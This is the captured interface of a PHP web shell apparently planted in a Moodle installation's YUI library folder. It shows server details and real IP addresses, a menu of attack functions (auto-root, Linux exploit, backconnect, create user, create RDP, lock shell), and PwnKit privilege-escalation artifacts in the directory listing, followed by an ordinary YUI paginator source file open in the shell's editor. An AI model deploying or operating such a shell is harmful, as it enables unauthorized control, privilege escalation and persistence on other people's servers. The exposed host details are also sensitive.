Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
yuilib /
3.17.2 /
paginator /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
paginator-debug.js
2.54
KB
-rwxrwxrwx
paginator-min.js
305
B
-rwxrwxrwx
paginator.js
2.54
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paginator-debug.js
/* YUI 3.17.2 (build 9c3c78e) Copyright 2014 Yahoo! Inc. All rights reserved. Licensed under the BSD License. http://yuilibrary.com/license/ */ YUI.add('paginator', function (Y, NAME) { /** The Paginator utility allows you to display an item or a group of items depending on the number of items you wish to display at one time. Paginator's primary functionality is contained in `paginator-core` and is mixed into `paginator` to allow `paginator` to have extra functionality added to it while leaving the core functionality untouched. This allows `paginator-core` to remain available for use later on or used in isolation if it is the only piece you need. Due to the vast number of interfaces a paginator could possibly consist of, `Paginator` does not contain any ready to use UIs. However, `Paginator` is ready to be used in any Based-based, module such as a Widget, by extending your desired class and mixing in `Paginator`. This is displayed in the following example: <pre><code> YUI().use('paginator-url', 'widget', function (Y){ var MyPaginator = Y.Base.create('my-paginator', Y.Widget, [Y.Paginator], { renderUI: function () { var numbers = '', i, numberOfPages = this.get('totalPages'); for (i = 1; i <= numberOfPages; i++) { // use paginator-url's formatUrl method numbers += '<a href="' + this.formatUrl(i) + '">' + i + '</a>'; } this.get('boundingBox').append(numbers); }, bindUI: function () { this.get('boundingBox').delegate('click', function (e) { // let's not go to the page, just update internally e.preventDefault(); this.set('page', parseInt(e.currentTarget.getContent(), 10)); }, 'a', this); this.after('pageChange', function (e) { // mark the link selected when it's the page being displayed var bb = this.get('boundingBox'), activeClass = 'selected'; bb.all('a').removeClass(activeClass).item(e.newVal).addClass(activeClass); }); } }); var myPg = new MyPaginator({ totalItems: 100, pageUrl: '?pg={page}' }); myPg.render(); }); </code></pre> @module paginator @main paginator @class Paginator @constructor @since 3.11.0 */ Y.Paginator = Y.mix( Y.Base.create('paginator', Y.Base, [Y.Paginator.Core]), Y.Paginator ); }, '3.17.2', {"requires": ["paginator-core"]});
Close